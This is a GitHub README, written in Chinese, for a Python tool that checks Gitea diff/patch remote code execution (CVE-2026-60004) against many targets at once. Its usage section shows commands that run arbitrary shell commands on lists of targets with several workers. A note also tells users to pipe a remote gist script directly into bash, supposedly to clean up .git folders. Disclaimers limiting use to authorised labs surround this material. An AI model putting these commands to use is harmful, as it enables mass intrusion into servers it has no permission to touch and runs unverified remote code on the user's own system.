HORKimhab/CVE-2026-60004
GitHub: HORKimhab/CVE-2026-60004
Gitea diff/patch 远程代码执行漏洞(CVE-2026-60004)的 Python 批量 PoC 验证工具。
Stars: 0 | Forks: 0
# CVE-2026-60004
更多信息:https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
## ⚡ 简易使用方法
仅在以下安全且经授权的环境中使用本项目:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 经授权的渗透测试环境
设置示例:
```
git clone
cd
# 项目使用 python 遵循以下步骤
# 创建虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 安装 requirments
pip install -r requirements.txt
```
使用示例:
```
# 1. 省略行的可选全局密码
export GITEA_PASSWORD='defaultpass'
# 2. 运行(先执行安全模式)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. 使用 3 个 worker 进行实际运行
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. 经典单目标仍然有效
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
```
注意:
- 如果从其他项目克隆,您必须运行 `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` 来清除嵌套的 .git 目录
- 例如:cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
# 📚 教育性安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
## ⚠️ 安全与法律免责声明
## 目的
本仓库仅供**教育和经授权的安全研究使用**。
旨在帮助用户学习:
- 安全漏洞
- 沙箱和隔离概念
- 安全编码和防御实践
## 仅限授权使用
仅在您已获得权限的环境中使用本仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 经授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
## 免责声明
作者和贡献者对本项目造成的任何损害、滥用、法律问题或损失**概不负责**。
使用本仓库即表示您同意:
- 您对自己的行为负责
- 您将合法且符合道德地使用它
- 本项目按“原样”提供,**不提供任何担保**
## 道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞防范意识
- 安全系统和软件研究
请遵循负责任的漏洞披露原则,并遵守所有适用的法律。
## 联系方式
如需进行负责任的漏洞披露或合作,请通过 GitHub 联系仓库维护者。
标签:CISA项目, CVE-2026-60004, Gitea, Python, 无后门, 逆向工具